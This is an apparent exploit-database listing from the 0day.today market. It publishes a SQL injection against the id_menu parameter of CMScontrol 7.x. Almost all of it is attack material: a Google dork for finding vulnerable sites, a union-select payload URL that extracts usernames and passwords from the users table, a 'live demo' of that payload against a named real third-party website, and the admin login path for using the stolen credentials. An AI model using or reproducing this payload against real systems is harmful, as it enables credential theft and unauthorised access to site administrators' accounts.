[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability

Author
ph1l1ster
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5794
Category
web applications
Date add
20-09-2009
Platform
unsorted
==============================================================
CMScontrol 7.x (index.php id_menu) SQL Injection Vulnerability
==============================================================


#=Info=======================================================================#
# Software: CMScontrol (Content Management Portal Solutions)  Sql Injection  #
# Version: 7.*                                                               #
# Vulnerability: Remote Sql Injection                                        #
# Google Dork: "index.php?id_menu=" CMScontrol                               # 
# Off. site: www.cmscontrol.com                                              #
#============================================================================#


#=Author==============================================#
# Author: ph1l1ster                                   #  
# Date: 20.09.2009                                    #
#=====================================================#


#=Sql Injection===========================================================================================================================================================#
# Exploit: http://site/index.php?id_menu=82+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users--                #
# Live demo: http://www.galsi.it/index.php?id_menu=99999+and+1=0+union+select+unhex(hex(1)),unhex(hex(concat_ws(0x3a,user,password))),unhex(hex(3))+from+users--   #
# Login page: http://site/admin/login.php                                                                                                                          #
#==================================================================================================================================================================#





#  0day.today [2024-11-15]  #